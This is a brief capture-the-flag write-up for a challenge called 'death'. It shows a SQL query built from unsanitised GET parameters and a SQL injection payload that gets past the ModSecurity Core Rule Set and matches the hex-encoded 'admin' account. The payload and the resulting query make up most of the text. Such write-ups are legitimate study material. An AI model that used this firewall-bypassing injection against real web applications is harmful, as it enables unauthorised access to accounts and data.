Skip to main content

death

1

We are provided with the SQL query:

SELECT id FROM prob_death WHERE id='{$_GET[id]}' AND pw=md5('{$_GET[pw]}')

In this challenge as well, the Mod Security CRS is being used.

 

MOD Security CRS

The MOD Security Core Rule Set, is a set of regex expressions that Web Application Firewalls can use to filter traffic. In this case, out input is being filtered based on this rule set.

In order to bypass this, we can refer thisGithub issue.

2

However, we have to modify the payload slightly.

-1'<@=1 OR id LIKE 0x61646d696e OR '

 

If we provide the following URI parameter:

?id=-1'<@=1 OR id LIKE 0x61646d696e OR '

The resultant query becomes:

SELECT id FROM prob_death WHERE id='-1'<@=1 OR id LIKE 0x61646d696e OR '' AND pw=md5('')

3